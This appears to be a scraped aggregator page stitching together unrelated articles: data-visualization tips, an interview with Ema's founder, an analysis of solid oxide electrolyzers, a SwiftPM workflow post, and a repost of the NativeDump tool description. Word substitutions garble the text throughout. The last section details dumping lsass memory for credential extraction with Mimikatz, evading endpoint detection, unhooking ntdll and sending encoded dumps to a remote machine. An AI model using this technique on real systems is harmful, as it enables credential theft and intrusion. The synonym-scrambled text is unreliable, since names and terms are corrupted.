9.7 C
New York
Tuesday, March 25, 2025
Home Blog Page 3768

5 Ideas for Efficient Knowledge Visualization


5 Ideas for Efficient Knowledge Visualization
Picture by Editor | Midjourney

 

Have you ever ever puzzled easy methods to rework information into clear and significant insights? Knowledge visualizations do exactly that. They flip complicated info into easy visualizations that everybody can shortly grasp. This text will discover 5 suggestions that can assist you create highly effective information visualizations.

Our High 5 Free Course Suggestions

1. Google Cybersecurity Certificates – Get on the quick observe to a profession in cybersecurity.

2. Pure Language Processing in TensorFlow – Construct NLP techniques

3. Python for Everyone – Develop packages to collect, clear, analyze, and visualize information

4. Google IT Help Skilled Certificates

5. AWS Cloud Options Architect – Skilled Certificates

 

1. Know Your Viewers

 

Understanding your viewers is essential to efficient information visualization. Adapt your visuals to fulfill their wants and expectations. Establish viewers by their backgrounds, roles, and pursuits. For example, traders deal with monetary metrics, whereas managers prioritize operational efficiencies. Alter the extent of element primarily based in your viewers. Specialists might have deep information evaluation, whereas decision-makers want clear summaries for strategic choices. Contemplate your viewers’s most popular format. Some want interactive dashboards, others static infographics or detailed studies. For instance, a advertising and marketing group would possibly want interactive dashboards to trace real-time marketing campaign efficiency metrics. In the meantime, a public relations group would possibly discover static infographics helpful for visually presenting media protection. Make sure that everybody can entry the info. Contemplate elements comparable to language expertise and visible impairments.

 

2. Select the Proper Visible

 

Several types of visuals have their strengths. It is vital to pick out the best chart for every objective.
Use a line graph to point out tendencies over time. Within the instance offered, line graph is used to plot the gross sales tendencies through the years.

 
Line chartLine chart
 

Go for a bar chart when evaluating classes amongst totally different teams. For instance, a bar chart can examine the gross sales efficiency throughout 5 totally different product classes.

 
Bar chartBar chart
 

Keep away from pie charts for clear information illustration. They’re arduous to learn and examine precisely. Small variations between slices are tough to tell apart. If there are too many classes, the pie chart turns into cluttered. The pie chart under visualizes the proportions of gross sales in several classes. There are numerous classes and small variations between the gross sales of every class. So, it is tough to interpret the pie chart.

 
Pie chartPie chart
 

3. Keep away from Deceptive Visualizations

 

Deceptive visualizations can distort the reality and result in misinterpretation of knowledge. Use correct scales on graphs to signify information in truth. Keep away from truncated axes or inconsistent scales that distort variations between information factors. Label all parts in your visualization:axes, information factors, and classes. Ambiguous or lacking labels can confuse viewers. Use constant models throughout all information factors and axes to stop confusion. Three-dimensional results can distort the notion of knowledge. Use 2D representations except the third dimension provides significant info. Watch out with shapes (like circles or squares) representing portions. Guarantee their measurement or space matches the numerical values they depict. Confirm information accuracy earlier than creating visuals. Errors in information assortment or processing can result in deceptive representations.

 

4. Maintain It Easy

 

When creating information visualizations, simplicity is essential to enhancing readability and effectiveness. Clear and easy visuals assist viewers grasp info shortly and precisely with out pointless distractions or confusion. Use concise labels that clearly describe every aspect in your visualization. Keep away from technical jargon that might confuse non-experts. Select fonts which might be straightforward to learn. Make sure the textual content is massive sufficient for comfy studying on screens or print. Give attention to important parts to convey your message. Use whitespace strategically to take care of visible stability and keep away from overcrowding. Guarantee constant use of coloration schemes that improve quite than distract from the info.

 

5. Inform a Story

 

Storytelling begins by framing the narrative across the information itself. Establish the precise difficulty your information evaluation goals to handle. Use charts or graphs for instance patterns throughout variables. Interpret the findings to find significant insights. Summarize a very powerful findings out of your evaluation.

Think about a retail chain analyzing buyer buying habits throughout its shops. They need to know which merchandise are hottest and why clients want sure gadgets. Charts and graphs present gross sales information for varied product classes throughout a number of areas. They reveal tendencies in buyer preferences and shopping for patterns over the previous 12 months. Findings point out best-selling merchandise and regional variations in buyer preferences.

 

Wrapping Up

 
In conclusion, use these tricks to create clear and impactful information visualizations. Apply them now to enhance understanding and make higher choices together with your information.
 
 

Jayita Gulati is a machine studying fanatic and technical author pushed by her ardour for constructing machine studying fashions. She holds a Grasp’s diploma in Pc Science from the College of Liverpool.

Surojit Chatterjee, Founder and CEO at Ema – Interview Sequence

0


Surojit Chatterjee is the founder and CEO of Ema. Beforehand, he guided Coinbase by means of a profitable 2021 IPO as its Chief Product Officer and scaled Google Cellular Advertisements and Google Purchasing into multi billion greenback companies because the VP and Head of Product. Surojit holds 40 US patents and has an MBA from MIT, MS in Laptop Science from SUNY at Buffalo, and B. Tech from IIT Kharagpur.

Ema is a common AI worker, seamlessly built-in into your group’s present IT infrastructure. She’s designed to reinforce productiveness, streamline processes, and empower your groups.

Are you able to elaborate on the imaginative and prescient behind Ema and what impressed you to create a common AI worker?

The objective for Ema is evident and daring: “rework enterprises by constructing a common AI worker.” This imaginative and prescient stems from our perception that AI can increase human capabilities moderately than change staff totally. Our Common AI Worker is designed to automate mundane, repetitive duties, liberating up human staff to concentrate on extra strategic and worthwhile work. We do that by means of Ema’s progressive agentic AI system, which may carry out a variety of complicated duties with a set of AI brokers (referred to as Ema’s Personas), bettering effectivity, and boosting productiveness throughout numerous organizations.

Each you and your co-founder have spectacular backgrounds at main tech firms. How has your previous expertise influenced the event and technique of Ema?

Over the past twenty years, I’ve labored at iconic firms like Google, Coinbase, Oracle and Flipkart. And at each place, I questioned “Why will we rent the neatest individuals and provides them jobs which are so mundane?.” That is why we’re constructing Ema.

Previous to co-founding Ema, I used to be the chief product officer of Coinbase and Flipkart and the worldwide head of product for cell adverts at Google. These experiences deepened my technical information throughout engineering, machine studying, and adtech. These roles allowed me to determine inefficiencies within the methods we work and methods to remedy complicated enterprise issues.

Ema’s co-founder and head of engineering, Souvik Sen, was beforehand the VP of engineering at Okta the place he oversaw information, machine studying, and gadgets. Earlier than that, he was at Google, the place he was engineering lead for information and machine studying the place he constructed one of many world’s largest ML methods, centered on privateness and security – Google’s Belief Graph. His experience, significantly, is a driving power to why Ema’s Agentic AI system is very correct and constructed to be enterprise prepared by way of safety and privateness.

My cofounder Souvik and I assumed what in case you had a Michelin Star Chef in-house who might cook dinner something you requested for. You is perhaps within the temper for French immediately, Italian tomorrow and Indian the day after. However no matter your temper or the delicacies you need, that chef can recreate the dish of your goals.  That’s what Ema can do. It will possibly tackle the position of no matter you want within the enterprise with only a easy dialog.

Ema makes use of over 100 massive language fashions and its personal smaller fashions. How do you guarantee seamless integration and optimum efficiency from these different sources?

LLM’s, whereas highly effective, fall quick in enterprise settings as a result of their lack of specialised information and context-specific coaching. These fashions are constructed on common information, leaving them ill-equipped to deal with the nuanced, proprietary data that drives enterprise operations. This limitation can result in inaccurate outputs, potential information safety dangers, and an lack of ability to supply domain-specific insights essential for knowledgeable decision-making. Agentic AI methods like Ema handle these shortcomings by providing a extra tailor-made and dynamic strategy. In contrast to static LLMs, our agentic AI methods can:

  • Adapt to enterprise-specific information and workflows
  • Leverage a number of LLMs primarily based on accuracy, value, and efficiency necessities
  • Preserve information privateness and safety by working inside firm infrastructure
  • Present explainable and verifiable outputs, essential for enterprise accountability
  • Repeatedly replace and be taught from real-time enterprise information
  • Execute complicated, multi-step duties autonomously

We guarantee seamless integration from these different sources by utilizing Ema’s proprietary 2T+ parameter combination of specialists mannequin: EmaFusionTM. EmaFusionTM combines 100+ public LLMs and plenty of area particular customized fashions to maximise accuracy on the lowest potential value for large number of duties within the enterprise, maximizing the return on funding. Plus, with this novel strategy, Ema is future-proof; we’re always including new fashions to stop overreliance on one know-how stack, taking this threat away from our enterprise prospects.

Are you able to clarify how the Generative Workflow Engine works and what benefits it gives over conventional workflow automation instruments?

We’ve developed tens of template Personas (or AI staff for particular roles). The personas could be configured and deployed shortly by enterprise customers – no coding information required. At its core, Ema’s Personas are collections of proprietary AI brokers that collaborate to carry out complicated workflows.

Our patent-pending Generative Workflow Engine™, a small transformer mannequin, generates workflows and orchestration code, choosing the suitable brokers and design patterns. Ema leverages well-known agentic design patterns, resembling reflection, planning, device use, multi-agent collaboration, language agent tree search (LATS), structured output and multi-agent collaboration, and introduces many progressive patterns of its personal. With over 200 pre-built connectors, Ema seamlessly integrates with inner information sources and might take actions throughout instruments to carry out successfully in varied enterprise roles.

Ema is utilized in varied domains from customer support to authorized to insurance coverage. Which industries do you see the best potential for progress with Ema, and why?

We see potential throughout industries and features as most enterprises have lower than 30% automation in processes and use greater than 200 software program purposes resulting in information and motion silos. McKinsey & Co. estimates that generative AI might add the equal of $2.6 trillion to $4.4 trillion yearly in productiveness positive aspects (supply).

These points are exacerbated in regulated industries like healthcare, monetary companies, insurance coverage the place a lot of the final many years technical automations haven’t occurred because the know-how was not superior sufficient for his or her processes. That is the place we see the largest alternative for transformation and are seeing a number of demand from prospects in these industries to leverage Generative AI and know-how like by no means earlier than.

How does Ema handle information safety and safety considerations, particularly when integrating a number of fashions and dealing with delicate enterprise information?

A urgent concern for any firm utilizing agentic AI is the potential for AI brokers to go rogue or leak personal information. Ema is constructed with belief at its core, compliant with main worldwide requirements resembling SOC 2, ISO 27001, HIPAA, GDPR, NIST AI RMF, NIST CSF, NIST 800-171 To make sure enterprise information stays personal, safe, and compliant, Ema has carried out the next safety measures:

  • Computerized redaction and protected de-identification of delicate information, audit logs
  • Actual-time monitoring
  • Encryption of all information at relaxation and in transit
  • Explainability throughout all output outcomes

To go the additional mile, Ema additionally checks for any copyright violations for doc era use circumstances, lowering prospects’ probability of IP liabilities. Ema additionally by no means trains fashions on one buyer’s information to profit different prospects.

Ema additionally gives versatile deployment choices together with on-premises deployment capabilities for a number of cloud methods, enabling enterprises to maintain their information inside their very own trusted environments.

How straightforward is it for a brand new firm to get began with Ema, and what does the standard onboarding course of seem like?

Ema is extremely intuitive, so getting groups began on the platform is kind of straightforward. Enterprise customers can arrange Ema’s Persona(s) utilizing pre-built templates in simply minutes. They’ll positive tune Persona conduct with conversational directions, use pre-built connectors to combine with their apps and information sources, and optionally plug in any personal customized fashions skilled on their very own information. As soon as arrange, specialists from the enterprise can prepare their Ema persona with just some hours of suggestions. Ema has been employed for a number of roles by enterprises resembling Envoy International, TrueLayer, Moneyview, and in every of those roles Ema is already acting at or above human efficiency.

Ema has attracted important funding from high-profile backers. What do you imagine has been the important thing to gaining such sturdy investor confidence?

We imagine buyers can see how Ema’s platform permits enterprises to make use of Agentic AI successfully, streamlining operations for substantial value reductions and unlocking new potential income streams. Moreover, Ema’s administration workforce are specialists in AI and have the required technical information and talent units. We even have a powerful monitor report of enterprise-grade supply, reliability, and compliance. Lastly, Ema’s merchandise are differentiated from the rest available on the market, it’s pioneering the newest technical developments in Agentic AI, making us the go-to selection for any enterprise wanting so as to add next-generation AI to their operations.

How do you see the position of AI within the office evolving over the subsequent decade, and what position will Ema play in that transformation?

Ema’s mission is to rework enterprises and assist each worker work quicker with the assistance of simple-to-activate and correct brokers. Our common AI worker has the potential to assist enterprises execute duties throughout buyer help, worker help, gross sales enablement, compliance, income operations, and extra. We’d like to rework the office by permitting groups to concentrate on probably the most strategic and highest-value tasks as an alternative of mundane, administrative duties. As a pioneer of agentic AI, Ema is main a brand new period of collaboration between human and AI staff, the place innovation thrives, and productiveness skyrockets.

Thanks for the good interview, readers who want to be taught extra ought to go to Ema.

Excessive Effectivity, Excessive Prices: Is There House for Stable Oxide Electrolyzers within the Hydrogen Business?


Stable oxide electrolyzers (SOECs) are rising to be a sizzling subject on the earth of vitality. They use a strong ceramic materials to separate water into hydrogen and oxygen at extraordinarily excessive temperatures (600°C to 850°C). As a result of excessive working temperature, they’re additionally extremely environment friendly, hitting vitality effectivity ranges between 80-100%. These ranges are considerably increased than different dominant electrolyzers available in the market comparable to Alkaline (AEL), Proton Trade Membrane (PEM), and Anion Trade Membrane (AEM), which often have effectivity ranges of 58-75%. 

Nonetheless, while SOEC effectivity is unparalleled, the excessive prices and technical challenges related to SOECs make them appropriate just for particular, high-value use instances.   

Word: LHV 33.3 refers back to the decrease heating worth of hydrogen (33.3 kWh/kg), used to calculate SOEC effectivity by measuring the vitality content material of the hydrogen produced. It represents the usable vitality with out accounting for water vaporization. 

The Promise of SOECs  

SOECs are distinguished by their excessive effectivity, usually attaining Increased Warmth Worth (HHV) effectivity above 100%. Which means that the vitality output of the method can exceed the vitality enter, a uncommon and worthwhile trait in vitality manufacturing applied sciences. This excessive effectivity leads to the manufacturing of high-purity hydrogen, which is essential for industries that require stringent high quality requirements, such because the artificial fuels sector.  

Moreover, SOECs can use waste warmth and steam from industrial processes, making them much more environment friendly and cheaper to run. It is a win for each price financial savings and sustainability in numerous industries. 

The place SOECs Actually Shine 

  • Artificial Fuels: SOECs are significantly appropriate for producing syngas (a mixture of hydrogen and carbon monoxide) for artificial fuels. The excessive purity of hydrogen means much less refining is required, making the entire course of cheaper and extra environment friendly. That is promising for the Sustainable Aviation Gasoline (SAF) business, which additionally has rising regulatory and manufacturing help. Offtake agreements comparable to Norsk e-fuels with Sunfire, and Airbus with Genvia, are already in place. 
     
  • Steelmaking: The metal business can minimize CO2 emissions by 80-90% utilizing SOECs, as hydrogen can exchange carbon within the iron ore discount course of. The high-temperature surroundings and the provision of waste warmth in metal vegetation align effectively with the operational wants of SOECs, additional rising effectivity. Initiatives like GrinHy with Sunfire and Salzgitter, and Ceres’ SteelCell improvement with Doosan, are key in demonstrating the viability of this use case.  
     
  • Nuclear Energy Crops: SOECs may be built-in into nuclear vegetation to supply hydrogen extra effectively utilizing the surplus warmth from the vegetation. This not solely boosts plant effectivity but in addition enhances security by decreasing the necessity for exterior hydrogen provides. The combination of hydrogen manufacturing inside nuclear vegetation may assist in balancing the vitality grid, offering a versatile and dependable vitality supply. Corporations like FuelCell Power and Bloom Power are exploring this potential. 
     

Company engagement by means of pilot demonstration vegetation and offtake agreements is essential for scaling up manufacturing from kilowatts (kW) to megawatts (MW). Such initiatives are already underway, indicating a rising curiosity and funding on this know-how.  

The Roadblocks 

Regardless of their advantages, the promise of SOECs comes at a excessive price—two to 3 instances costlier than different electrolyzers. In addition they face technical challenges as a result of their excessive working temperatures, which may result in sooner wear-and-tear and better upfront prices. Whereas excessive working temperatures will help mitigate efficiency loss, in addition they induce thermal stress, rising the chance of stack failure by means of electrolyte cracking or seal breakage. SOECs can run at full load for about 2.5 years, whereas different electrolyzers can final 4-8 instances longer. 

Moreover, SOEC know-how depends closely on electrical energy prices as a result of it wants numerous vitality to run the high-temperature electrolysis course of. It’s less expensive in locations the place electrical energy is affordable or there may be loads of inexpensive renewable vitality. Alternatively, it struggles in areas with excessive electrical energy prices, unstable energy, or small-scale setups. SOECs want regular excessive temperatures and secure energy to work effectively, so areas with unreliable renewable vitality sources like photo voltaic or wind can have points until they use vitality storage options or good grid administration to clean out the ability provide. 

Scaling manufacturing from kW to MW would drastically scale back manufacturing and materials prices and financial savings in complete stack price may be 67% to 77% when evaluating kW to MW scaled applied sciences. Nonetheless, just a few innovators comparable to Bloom Power and Topsoe have stacks at giant scales, that are important to exhibit technical maturity and long-term viability to buyers. 

   

Innovating for the Future 

Wanting forward, the main target for SOEC know-how is on technical innovation and value discount. ‘Subsequent-generation’ SOEC know-how goals to handle the present limitations by enhancing the sturdiness of supplies, optimizing design, and enhancing manufacturing processes. Some examples are:  

Manufacturing Innovation: 

  • Mitsubishi Heavy Industries: Makes use of tubes as a substitute of sheets for stack manufacturing – simplifies gasoline sealing and circulation administration, resulting in improved efficiency reliability
  • FuelCell Power: Makes use of disc-shaped stacks to chop prices by repurposing DVD manufacturing equipment; stacks are 95% recyclable
  • Elcogen: Automating stack meeting to hurry up manufacturing and decrease prices 

Materials and Design Innovation: 

  • Ceres: Makes use of a Gadolinium-doped ceria electrolyte, which permits for decrease temperature operation, and stack makes use of much less nickel – improves sturdiness and reduces prices
  • Elcogen: Operates at a decrease temperature, permitting using cheaper parts comparable to stainless-steel as a substitute of specialised alloys
  • Bloom Power: Chopping out deoxygenation models to simplify system design – reduces prices and upkeep wants 

Integration Innovation: 

  • Topsoe: Integration of electrolyzer know-how with ammonia and methanol manufacturing, leveraging experience by means of their catalyst enterprise
  • Sunfire: Crops operating on a mixture of alkaline and SOEC electrolyzers, offering a robust benefit for the power-to-liquid and e-fuels markets

These developments are paving the way in which for SOECs to scale up and turn into extra inexpensive. Because the vitality panorama shifts, SOECs may play an important function in a sustainable and environment friendly hydrogen financial system. Nonetheless, realizing this potential will depend upon continued innovation and company partnerships.  

A unique technique to develop SwiftPM Packages inside Xcode tasks — Erica Sadun


WWDC gave us many causes to each migrate libraries to SwiftPM and to develop new ones to help our work. The mixing between Xcode growth and SwiftPM dependencies retains rising stronger and extra essential.

Apple’s Modifying a Package deal Dependency as a Native Package deal assumes you’ll drag in your bundle to an Xcode undertaking as a neighborhood bundle overrides one which’s imported by way of a standard bundle dependency.

In Growing a Swift Package deal in Tandem with an App, Apple writes, “To develop a Swift bundle in tandem with an app, you possibly can leverage the habits whereby a neighborhood bundle overrides a bundle dependency with the identical identify…when you launch a brand new model of your Swift bundle or wish to cease utilizing the native bundle, take away it from the undertaking to make use of the bundle dependency once more.”

I don’t use this strategy. It’s not dangerous or incorrect, it simply doesn’t match my type.

However, opening the Package deal.swift file on to develop has drawbacks in that it doesn’t totally provide Xcode’s suite of IDE help options but.

So I’ve been engaged on a private answer that greatest works for me. I need my bundle growth and its assessments to reside individually from any particular shopper app exterior a testbed. I want to make sure that my code will swift construct and swift take a look at correctly however I additionally wish to use Xcode’s built-in compilation and unit testing with my glad inexperienced checks.

I set out to determine how greatest, no less than for me, to develop Swift packages underneath the xcodeproj umbrella.

I first explored  swift bundle generate-xcodeproj. This builds an Xcode library undertaking full with assessments and a bundle goal. You should use the --type flag to set the bundle to executable, system-module, or manifest as a substitute of the default (library) throughout swift bundle init:

Generate% swift bundle init
Creating library bundle: Generate
Creating Package deal.swift
Creating README.md
Creating .gitignore
Creating Sources/
Creating Sources/Generate/Generate.swift
Creating Assessments/
Creating Assessments/LinuxMain.swift
Creating Assessments/GenerateTests/
Creating Assessments/GenerateTests/GenerateTests.swift
Creating Assessments/GenerateTests/XCTestManifests.swift
Generate% swift bundle generate-xcodeproj
generated: ./Generate.xcodeproj

Though SwiftPM creates a .gitignore file for you as you see, it doesn’t initialize a git repository. Additionally, I all the time find yourself deleting the .gitignore as I take advantage of a personalized world ignore file. That is what the ensuing undertaking seems like:

As you see, the generated Xcode undertaking has the whole lot however a testbed for you. I actually like having an on-hand testbed, whether or not a easy SwiftUI app or a command line utility to play with concepts. I regarded into utilizing a playground however let’s face it: too sluggish, too glitchy, too unreliable.

It’s a ache so as to add a testbed to this set-up, so I got here up with a distinct technique to construct my base bundle surroundings. It’s hacky however I a lot desire the end result. As a substitute of producing the undertaking, I begin with a testbed undertaking after which create my bundle. This strategy naturally packs a pattern with the bundle however none of that pattern leaks into the bundle itself:

I find yourself with three targets: the pattern app, a library constructed from my Sources, and my assessments. The library folder you see right here accommodates solely an Data.plist and a bridging header. It in any other case builds from no matter Sources I’ve added.

I a lot desire this set-up to the generate-xcodeproj strategy, though it takes barely longer to set-up. The explanation for that is that SwiftPM and Xcode use completely different philosophies for the way a undertaking folder is structured. SwiftPM has its Sources and Assessments. Xcode makes use of a supply folder named after the undertaking.

So I take away that folder, add a Sources group to the undertaking, and be sure that my construct phases sees and compiles these recordsdata. The Assessments want related tweaks, plus I’ve so as to add a symbolic hyperlink from Xcode’s assessments identify (e.g. “ProjectNameAssessments”) to my SwiftPM Assessments folder on the prime degree of my undertaking to get it to all dangle collectively. As soon as I’ve achieved so my inexperienced checks are prepared and ready simply as if I had opened the Package deal.swift file instantly. However this time, I’ve all the precise instruments at hand.

Since I’m speaking about set-up, let me add that my duties additionally embrace organising the README, including a license and creating the preliminary change log. These are SwiftPM setup duties that swift bundle init doesn’t cowl the way in which I like. I trash .gitignore however since I’ve Xcode set-up to routinely initialize model management, I don’t should git init by hand.

I believe it is a short-term workaround as I count on the combination of SwiftPM and Xcode to proceed rising over the following couple of years. Since WWDC, I’ve been notably enthusiastic about creating, deploying, and integrating SwiftPM packages. I assumed I’d share this in case it would assist others. Let me know.

Dump Lsass Utilizing Solely Native APIs By Hand-Crafting Minidump Recordsdata (With out MinidumpWriteDump!)

0




Dump Lsass Utilizing Solely Native APIs By Hand-Crafting Minidump Recordsdata (With out MinidumpWriteDump!)

NativeDump permits to dump the lsass course of utilizing solely NTAPIs producing a Minidump file with solely the streams wanted to be parsed by instruments like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List Streams).

  • NTOpenProcessToken and NtAdjustPrivilegeToken to get the “SeDebugPrivilege” privilege
  • RtlGetVersion to get the Working System model particulars (Main model, minor model and construct quantity). That is needed for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll tackle. That is the one module needed for the ModuleList Stream
  • NtOpenProcess to get a deal with for the lsass course of
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop by the reminiscence areas and dump all potential ones. On the identical time it populates the Memory64List Stream

Utilization:

NativeDump.exe [DUMP_FILE]

The default file identify is “proc_.dmp”:

Dump Lsass Utilizing Solely Native APIs By Hand-Crafting Minidump Recordsdata (With out MinidumpWriteDump!)

The software has been examined towards Home windows 10 and 11 units with the most typical safety options (Microsoft Defender for Endpoints, Crowdstrike…) and is for now undetected. Nonetheless, it doesn’t work if PPL is enabled within the system.

Some advantages of this system are: – It doesn’t use the well-known dbghelp!MinidumpWriteDump operate – It solely makes use of capabilities from Ntdll.dll, so it’s potential to bypass API hooking by remapping the library – The Minidump file doesn’t must be written to disk, you may switch its bytes (encoded or encrypted) to a distant machine

The challenge has three branches in the intervening time (other than the primary department with the fundamental method):

  • ntdlloverwrite – Overwrite ntdll.dll’s “.textual content” part utilizing a clear model from the DLL file already on disk

  • delegates – Overwrite ntdll.dll + Dynamic operate decision + String encryption with AES + XOR-encoding

  • distant – Overwrite ntdll.dll + Dynamic operate decision + String encryption with AES + Ship file to distant machine + XOR-encoding

Method intimately: Making a minimal Minidump file

After studying Minidump undocumented constructions, its construction will be summed as much as:

  • Header: Info just like the Signature (“MDMP”), the placement of the Stream Listing and the variety of streams
  • Stream Listing: One entry for every stream, containing the kind, complete measurement and placement within the file of every one
  • Streams: Each stream comprises totally different data associated to the method and has its personal format
  • Areas: The precise bytes from the method from every reminiscence area which will be learn

I created a parsing software which will be useful: MinidumpParser.

We are going to concentrate on creating a sound file with solely the required values for the header, stream listing and the one 3 streams wanted for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


A. Header

The header is a 32-bytes construction which will be outlined in C# as:

public struct MinidumpHeader
{
public uint Signature;
public ushort Model;
public ushort ImplementationVersion;
public ushort NumberOfStreams;
public uint StreamDirectoryRva;
public uint CheckSum;
public IntPtr TimeDateStamp;
}

The required values are: – Signature: Fastened worth 0x504d44d (“MDMP” string) – Model: Fastened worth 0xa793 (Microsoft fixed MINIDUMP_VERSION) – NumberOfStreams: Fastened worth 3, the three Streams required for the file – StreamDirectoryRVA: Fastened worth 0x20 or 32 bytes, the dimensions of the header


B. Stream Listing

Every entry within the Stream Listing is a 12-bytes construction so having 3 entries the dimensions is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
public uint StreamType;
public uint Measurement;
public uint Location;
}

The sector “StreamType” represents the kind of stream as an integer or ID, a few of the most related are:

ID Stream Sort
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 HandleOperationListStream

C. SystemInformation Stream

First stream is a SystemInformation Stream, with ID 7. The scale is 56 bytes and might be positioned at offset 68 (0x44), after the Stream Listing. Its C# definition is:

public struct SystemInformationStream
{
public ushort ProcessorArchitecture;
public ushort ProcessorLevel;
public ushort ProcessorRevision;
public byte NumberOfProcessors;
public byte ProductType;
public uint MajorVersion;
public uint MinorVersion;
public uint BuildNumber;
public uint PlatformId;
public uint UnknownField1;
public uint UnknownField2;
public IntPtr ProcessorFeatures;
public IntPtr ProcessorFeatures2;
public uint UnknownField3;
public ushort UnknownField14;
public byte UnknownField15;
}

The required values are: – ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Home windows programs – Main model, Minor model and the BuildNumber: Hardcoded or obtained by kernel32!GetVersionEx or ntdll!RtlGetVersion (we’ll use the latter)


D. ModuleList Stream

Second stream is a ModuleList stream, with ID 4. It’s positioned at offset 124 (0x7C) after the SystemInformation stream and it’ll even have a set measurement, of 112 bytes, since it can have the entry of a single module, the one one wanted for the parse to be appropriate: “lsasrv.dll”.

The standard construction for this stream is a 4-byte worth containing the variety of entries adopted by 108-byte entries for every module:

public struct ModuleListStream
{
public uint NumberOfModules;
public ModuleInfo[] Modules;
}

As there is just one, it will get simplified to:

public struct ModuleListStream
{
public uint NumberOfModules;
public IntPtr BaseAddress;
public uint Measurement;
public uint UnknownField1;
public uint Timestamp;
public uint PointerName;
public IntPtr UnknownField2;
public IntPtr UnknownField3;
public IntPtr UnknownField4;
public IntPtr UnknownField5;
public IntPtr UnknownField6;
public IntPtr UnknownField7;
public IntPtr UnknownField8;
public IntPtr UnknownField9;
public IntPtr UnknownField10;
public IntPtr UnknownField11;
}

The required values are: – NumberOfStreams: Fastened worth 1 – BaseAddress: Utilizing psapi!GetModuleBaseName or a mixture of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we’ll use the latter) – Measurement: Obtained including all reminiscence area sizes since BaseAddress till one with a measurement of 4096 bytes (0x1000), the .textual content part of different library – PointerToName: Unicode string construction for the “C:WindowsSystem32lsasrv.dll” string, positioned after the stream itself at offset 236 (0xEC)


E. Memory64List Stream

Third stream is a Memory64List stream, with ID 9. It’s positioned at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its measurement is dependent upon the variety of modules.

public struct Memory64ListStream
{
public ulong NumberOfEntries;
public uint MemoryRegionsBaseAddress;
public Memory64Info[] MemoryInfoEntries;
}

Every module entry is a 16-bytes construction:

public struct Memory64Info
{
public IntPtr Handle;
public IntPtr Measurement;
}

The required values are: – NumberOfEntries: Variety of reminiscence areas, obtained after looping reminiscence areas – MemoryRegionsBaseAddress: Location of the beginning of reminiscence areas bytes, calculated after including the dimensions of all 16-bytes reminiscence entries – Handle and Measurement: Obtained for every legitimate area whereas looping them


F. Looping reminiscence areas

There are pre-requisites to loop the reminiscence areas of the lsass.exe course of which will be solved utilizing solely NTAPIs:

  1. Receive the “SeDebugPrivilege” permission. As an alternative of the standard Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivilege, we’ll use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded worth of 20 for the Luid (which is fixed in all newest Home windows variations)
  2. Receive the method ID. For instance, loop all processes utilizing ntdll!NtGetNextProcess, acquire the PEB tackle with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to learn the ImagePathName discipline inside ProcessParameters. To keep away from overcomplicating the PoC, we’ll use .NET’s Course of.GetProcessesByName()
  3. Open a course of deal with. Use ntdll!OpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve course of data and PROCESS_VM_READ (0x0010) to learn the reminiscence bytes

With this it’s potential to traverse course of reminiscence by calling: – ntdll!NtQueryVirtualMemory: Return a MEMORY_BASIC_INFORMATION construction with the safety sort, state, base tackle and measurement of every reminiscence area – If the reminiscence safety shouldn’t be PAGE_NOACCESS (0x01) and the reminiscence state is MEM_COMMIT (0x1000), that means it’s accessible and dedicated, the bottom tackle and measurement populates one entry of the Memory64List stream and bytes will be added to the file – If the bottom tackle equals lsasrv.dll base tackle, it’s used to calculate the dimensions of lsasrv.dll in reminiscence – ntdll!NtReadVirtualMemory: Add bytes of that area to the Minidump file after the Memory64List Stream


G. Creating Minidump file

After earlier steps we’ve all that’s essential to create the Minidump file. We will create a file regionally or ship the bytes to a distant machine, with the potential for encoding or encrypting the bytes earlier than. A few of these potentialities are coded within the delegates department, the place the file created regionally will be encoded with XOR, and within the distant department, the place the file will be encoded with XOR earlier than being despatched to a distant machine.